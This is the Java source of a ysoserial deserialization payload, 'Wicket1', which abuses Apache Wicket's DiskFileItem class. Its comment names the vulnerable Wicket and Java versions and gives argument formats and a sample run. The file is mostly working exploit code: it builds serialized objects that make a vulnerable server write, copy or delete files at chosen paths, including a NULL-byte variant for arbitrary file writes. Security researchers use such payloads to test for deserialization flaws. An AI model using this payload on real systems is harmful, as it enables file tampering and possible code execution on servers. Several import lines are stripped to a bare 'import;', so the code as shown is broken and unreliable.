package ysoserial.payloads; import; import; import; import java.util.Arrays; import org.apache.commons.codec.binary.Base64; import org.apache.wicket.util.upload.DiskFileItem; import; import; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; /** * This gadget is almost identical to FileUpload1 since it appears * that Apache Wicket copied a version of Apache Commons DiskFileItem * prior to Pierre Ernst reporting CVE-2013-2186 (NULL byte attack). That * means that if the target is running less than Oracle Java 7 update 40 * then the NULL byte attack is viable. Otherwise, copy and move attacks * always work. * * This attack is valid for the 1.x and 6.x lines of Apache Wicket but * was fixed in 1.5.16 and 6.24.0 (released July 2016). * * * Arguments: * - copyAndDelete;sourceFile;destDir * - write;destDir;ascii-data * - writeB64;destDir;base64-data * - writeOld;destFile;ascii-data * - writeOldB64;destFile;base64-data * * Example: * Wicket1 "write;/tmp;blue lobster" * * Result: * $ ls -l /tmp/ * -rw-rw-r-- 1 albino_lobster albino_lobster 12 Jul 25 14:10 upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp * $ cat /tmp/upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp * blue lobster */ @Dependencies({"wicket-util:wicket-util:6.23"}) public class Wicket1 implements ReleaseableObjectPayload<DiskFileItem> { public DiskFileItem getObject(String command) throws Exception { String[] parts = command.split(";"); if (parts.length != 3) { throw new IllegalArgumentException("Bad command format."); } if ("copyAndDelete".equals(parts[0])) { return copyAndDelete(parts[1], parts[2]); } else if ("write".equals(parts[0])) { return write(parts[1], parts[2].getBytes("US-ASCII")); } else if ("writeB64".equals(parts[0]) ) { return write(parts[1], Base64.decodeBase64(parts[2])); } else if ("writeOld".equals(parts[0]) ) { return writeOldJRE(parts[1], parts[2].getBytes("US-ASCII")); } else if ("writeOldB64".equals(parts[0]) ) { return writeOldJRE(parts[1], Base64.decodeBase64(parts[2])); } throw new IllegalArgumentException("Unsupported command " + command + " " + Arrays.toString(parts)); } public void release(DiskFileItem obj) throws Exception { } private static DiskFileItem copyAndDelete ( String copyAndDelete, String copyTo ) throws IOException, Exception { return makePayload(0, copyTo, copyAndDelete, new byte[1]); } // writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp) private static DiskFileItem write ( String dir, byte[] data ) throws IOException, Exception { return makePayload(data.length + 1, dir, dir + "/whatever", data); } // writes data to an arbitrary file private static DiskFileItem writeOldJRE(String file, byte[] data) throws IOException, Exception { return makePayload(data.length + 1, file + "\0", file, data); } private static DiskFileItem makePayload(int thresh, String repoPath, String filePath, byte[] data) throws IOException, Exception { // if thresh < written length, delete outputFile after copying to repository temp file // otherwise write the contents to repository temp file File repository = new File(repoPath); DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository, null); File outputFile = new File(filePath); DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile); OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream"); os.write(data); Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length); Reflections.setFieldValue(diskFileItem, "dfos", dfos); Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0); return diskFileItem; } public static void main ( final String[] args ) throws Exception {, args); } }